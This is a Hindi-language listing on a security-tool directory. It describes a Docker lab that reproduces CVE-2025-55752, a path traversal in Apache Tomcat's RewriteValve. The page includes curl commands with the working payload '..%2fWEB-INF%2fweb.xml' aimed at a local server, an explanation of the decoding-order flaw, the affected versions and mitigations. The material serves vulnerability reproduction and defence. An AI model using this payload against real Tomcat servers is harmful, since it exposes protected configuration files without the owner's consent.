Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55752 — # CVE-2025-55752 के लिए Docker-आधारित प्रजनन वातावरण Apache Tomcat के RewriteValve में पाथ ट्रैवर्सल भेद्यता, जो डिकोड-से-पहले-नॉर्मलाइज़ (normalize-before-decode) दोष को प्रदर्शित करती है और परीक्षण कमांड प्रदान करती है। | Kitploit
उपकरण/GitHubGitHub/masahiro331/cve-2025-55752
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubmasahiro331/cve-2025-55752

CVE-2025-55752

# CVE-2025-55752 के लिए Docker-आधारित प्रजनन वातावरण Apache Tomcat के RewriteValve में पाथ ट्रैवर्सल भेद्यता, जो डिकोड-से-पहले-नॉर्मलाइज़ (normalize-before-decode) दोष को प्रदर्शित करती है और परीक्षण कमांड प्रदान करती है।

रिपॉजिटरी देखें
14310 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55752: Apache Tomcat पाथ ट्रैवर्सल भेद्यता

CVE-2025-55752 के लिए Docker-आधारित पुनरुत्पादन वातावरण, जो Apache Tomcat 10.1.44 में एक पाथ ट्रैवर्सल भेद्यता है।

अवलोकन

CVE-2025-55752 Apache Tomcat के RewriteValve में एक पाथ ट्रैवर्सल भेद्यता है जो गलत प्रोसेसिंग क्रम के कारण होती है: URL नॉर्मलाइज़ेशन URL डिकोडिंग से पहले होता है। यह हमलावरों को URL-एन्कोडेड पाथ ट्रैवर्सल अनुक्रमों (..%2f) का उपयोग करके /WEB-INF/ जैसी निर्देशिकाओं की सुरक्षा बाधाओं को बायपास करने की अनुमति देता है।

भेद्यता विशेषताएँ

  • CVE ID: CVE-2025-55752
  • CVSS v3.1: 7.5 (HIGH)
  • CWE: CWE-22 (पाथ ट्रैवर्सल)
  • घटक: Apache Tomcat RewriteValve
  • मूल कारण: नॉर्मलाइज़-पहले-डिकोड प्रोसेसिंग क्रम

प्रभावित संस्करण

श्रृंखलाभेद्य संस्करणपैच किया गया संस्करण
11.x11.0.0-M1 से 11.0.1011.0.11+
10.1.x10.1.0-M1 से 10.1.4410.1.45+
9.0.x9.0.0-M11 से 9.0.1089.0.109+
8.5.x8.5.6 से 8.5.100EOL - कोई पैच नहीं

त्वरित प्रारंभ

root@kitploit:~
git clone https://github.com/masahiro331/CVE-2025-55752.git
cd CVE-2025-55752
docker-compose up -d
curl http://localhost:8080/

भेद्यता परीक्षण

परीक्षण 1: सीधा WEB-INF एक्सेस (संरक्षित)

root@kitploit:~
curl -I 'http://localhost:8080/WEB-INF/web.xml'

अपेक्षित: 403 Forbidden

परीक्षण 2: सूचना प्रकटीकरण (संरक्षित फ़ाइलें पढ़ें)

root@kitploit:~
curl -s 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml' | head -5
curl -I 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml'

अपेक्षित: 200 OK + web.xml सामग्री (भेद्यता की पुष्टि)

यह कैसे काम करता है

  1. अनुरोध: /download?path=..%2fWEB-INF%2fweb.xml
  2. RewriteValve पुनर्लेखन: /files/..%2fWEB-INF%2fweb.xml
  3. URL नॉर्मलाइज़ेशन (डिकोड से पहले): %2f को / के रूप में मान्यता नहीं दी गई, .. बच जाता है
  4. URL डिकोडिंग: %2f → / → /files/../WEB-INF/web.xml
  5. पाथ समाधान: /WEB-INF/web.xml

प्रोसेसिंग क्रम समस्या

root@kitploit:~
सही:    डिकोड → नॉर्मलाइज़ → सुरक्षा जाँच
भेद्य: नॉर्मलाइज़ → डिकोड → सुरक्षा जाँच ✗

Tomcat फिक्स

  • GitHub: apache/tomcat commit 130d36d8
  • फिक्स: नॉर्मलाइज़ से पहले डिकोड करें

शमन

  1. यदि आवश्यक न हो तो RewriteValve अक्षम करें
  2. PUT विधि अक्षम करें
  3. ../ और %2e%2e को ब्लॉक करने के लिए WAF नियम
  4. पैच किए गए संस्करणों में अपग्रेड करें (10.1.45+, 9.0.109+, 11.0.11+)

संदर्भ

  • Apache Tomcat सुरक्षा
  • NVD - CVE-2025-55752
  • OWASP पाथ ट्रैवर्सल
  • CWE-22: पाथनाम का अनुचित सीमाकरण

अस्वीकरण

⚠️ चेतावनी: उत्पादन में तैनात न करें। केवल पृथक परीक्षण वातावरण में उपयोग करें।

टूल डाउनलोड करें